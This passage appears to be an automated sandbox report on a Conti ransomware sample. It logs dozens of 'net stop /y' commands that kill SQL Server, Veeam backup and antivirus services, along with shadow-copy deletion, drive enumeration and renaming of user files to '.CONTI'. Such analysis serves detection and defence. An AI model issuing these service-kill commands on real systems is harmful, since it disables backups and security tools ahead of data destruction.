cmd.exe /c net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLBrowser /y

C:\Windows\SysWOW64\net.exe

net stop SQLBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net.exe

net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSafeOLRService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLWriter /y

C:\Windows\SysWOW64\net.exe

net stop SQLWriter /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLWriter /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBackupSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCloudSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploySvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamMountSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamRESTSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop W3Svc /y

C:\Windows\SysWOW64\net.exe

net stop W3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop W3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop WRSVC /y

C:\Windows\SysWOW64\net.exe

net stop WRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop WRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop swi_update /y

C:\Windows\SysWOW64\net.exe

net stop swi_update /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop swi_update /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop msftesql$PROD /y

C:\Windows\SysWOW64\net.exe

net stop msftesql$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop msftesql$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net.exe

net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetMsmqActivator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EhttpSrv /y

C:\Windows\SysWOW64\net.exe

net stop EhttpSrv /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EhttpSrv /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ekrn /y

C:\Windows\SysWOW64\net.exe

net stop ekrn /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ekrn /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ESHASRV /y

C:\Windows\SysWOW64\net.exe

net stop ESHASRV /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ESHASRV /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AVP /y

C:\Windows\SysWOW64\net.exe

net stop AVP /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AVP /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop klnagent /y

C:\Windows\SysWOW64\net.exe

net stop klnagent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop klnagent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfefire /y

C:\Windows\SysWOW64\net.exe

net stop mfefire /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfefire /y

Network

N/A

Files

memory/1540-53-0x0000000075A71000-0x0000000075A73000-memory.dmp

memory/1512-54-0x0000000000000000-mapping.dmp

memory/964-55-0x0000000000000000-mapping.dmp

memory/1140-56-0x0000000000000000-mapping.dmp

memory/1884-57-0x0000000000000000-mapping.dmp

memory/656-58-0x0000000000000000-mapping.dmp

memory/864-59-0x0000000000000000-mapping.dmp

memory/1220-60-0x0000000000000000-mapping.dmp

memory/820-61-0x0000000000000000-mapping.dmp

memory/1648-62-0x0000000000000000-mapping.dmp

memory/852-63-0x0000000000000000-mapping.dmp

memory/1960-64-0x0000000000000000-mapping.dmp

memory/1828-65-0x0000000000000000-mapping.dmp

memory/1492-66-0x0000000000000000-mapping.dmp

memory/1680-67-0x0000000000000000-mapping.dmp

memory/1632-68-0x0000000000000000-mapping.dmp

memory/1944-69-0x0000000000000000-mapping.dmp

memory/1692-70-0x0000000000000000-mapping.dmp

memory/1728-71-0x0000000000000000-mapping.dmp

memory/1612-72-0x0000000000000000-mapping.dmp

memory/1488-73-0x0000000000000000-mapping.dmp

memory/1532-74-0x0000000000000000-mapping.dmp

memory/788-75-0x0000000000000000-mapping.dmp

memory/1880-76-0x0000000000000000-mapping.dmp

memory/472-77-0x0000000000000000-mapping.dmp

memory/888-78-0x0000000000000000-mapping.dmp

memory/620-79-0x0000000000000000-mapping.dmp

memory/1508-80-0x0000000000000000-mapping.dmp

memory/1760-81-0x0000000000000000-mapping.dmp

memory/756-82-0x0000000000000000-mapping.dmp

memory/1956-83-0x0000000000000000-mapping.dmp

memory/1324-84-0x0000000000000000-mapping.dmp

memory/612-85-0x0000000000000000-mapping.dmp

memory/1044-86-0x0000000000000000-mapping.dmp

memory/1560-87-0x0000000000000000-mapping.dmp

memory/1588-88-0x0000000000000000-mapping.dmp

memory/1868-89-0x0000000000000000-mapping.dmp

memory/1824-90-0x0000000000000000-mapping.dmp

memory/1832-91-0x0000000000000000-mapping.dmp

memory/1328-92-0x0000000000000000-mapping.dmp

memory/1632-93-0x0000000000000000-mapping.dmp

memory/1740-94-0x0000000000000000-mapping.dmp

memory/1312-95-0x0000000000000000-mapping.dmp

memory/1728-96-0x0000000000000000-mapping.dmp

memory/1732-97-0x0000000000000000-mapping.dmp

memory/1172-98-0x0000000000000000-mapping.dmp

memory/1784-99-0x0000000000000000-mapping.dmp

memory/1720-100-0x0000000000000000-mapping.dmp

memory/1812-101-0x0000000000000000-mapping.dmp

memory/1836-102-0x0000000000000000-mapping.dmp

memory/1168-103-0x0000000000000000-mapping.dmp

memory/1752-104-0x0000000000000000-mapping.dmp

memory/576-105-0x0000000000000000-mapping.dmp

memory/568-106-0x0000000000000000-mapping.dmp

memory/948-107-0x0000000000000000-mapping.dmp

memory/544-108-0x0000000000000000-mapping.dmp

memory/1152-109-0x0000000000000000-mapping.dmp

memory/864-110-0x0000000000000000-mapping.dmp

memory/656-111-0x0000000000000000-mapping.dmp

memory/592-112-0x0000000000000000-mapping.dmp

memory/1820-113-0x0000000000000000-mapping.dmp

memory/1508-114-0x0000000000000000-mapping.dmp

memory/1192-115-0x0000000000000000-mapping.dmp

memory/1952-116-0x0000000000000000-mapping.dmp

memory/756-117-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-28 09:27

Reported

2021-09-28 09:30

Platform

win10-en-20210920

Max time kernel

146s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe"

Signatures

Conti Ransomware

ransomware conti

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\PublishApprove.tiff => C:\Users\Admin\Pictures\PublishApprove.tiff.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SkipSplit.tiff C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File renamed C:\Users\Admin\Pictures\CheckpointPush.crw => C:\Users\Admin\Pictures\CheckpointPush.crw.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File renamed C:\Users\Admin\Pictures\SkipSplit.tiff => C:\Users\Admin\Pictures\SkipSplit.tiff.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File renamed C:\Users\Admin\Pictures\SkipDismount.crw => C:\Users\Admin\Pictures\SkipDismount.crw.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\PublishApprove.tiff C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
